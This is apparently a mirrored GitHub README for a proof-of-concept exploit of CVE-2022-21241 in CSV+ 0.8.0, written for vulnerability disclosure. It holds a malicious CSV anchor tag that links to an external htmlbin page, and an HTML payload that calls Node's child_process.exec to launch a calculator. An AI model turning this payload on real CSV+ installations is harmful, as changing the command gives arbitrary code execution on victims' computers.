satoki / csv-plus_vulnerability

πŸ‘» [PoC] CSV+ 0.8.0 - Arbitrary Code Execution (CVE-2022-21241)

Home Page:https://jvn.jp/jp/JVN67396225/

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

csv-plus_vulnerability

πŸ‘» 2-Click Arbitrary Code Execution Vulnerability.

PoC.gif

CVE-2022-21241

⚠
This PoC was created to alert users and investigate vulnerabilities in their own CSV+, and is prohibited to be used for attacks.

Vulnerability

The following versions are vulnerable.

  • CSV+ <= 0.8.0

Attackers can execute arbitrary code by using the Node.js functionality. They will place the malicious js code on some site and link it from a-tags with the HTML injection vulnerability in CSV+.

PoC

scenario.png

Malicious csv file

<a href='https://electronooooo.htmlbin.net/xsscalc.html'>click me πŸ‘»</a>

https://electronooooo.htmlbin.net/xsscalc.html is a temporary link.

Malicious html file (calc)

<!DOCTYPE html>
<html>
    <head>
        <script>
        if (confirm("Do you want to run a calculator to check for vulnerabilities?")){
            var cmd = "calc";
            require("child_process").exec(cmd);
        }
        </script>
    </head>
    <body>
        Hi :)
    </body>
</html>

About

πŸ‘» [PoC] CSV+ 0.8.0 - Arbitrary Code Execution (CVE-2022-21241)

https://jvn.jp/jp/JVN67396225/


Languages

Language:HTML 100.0%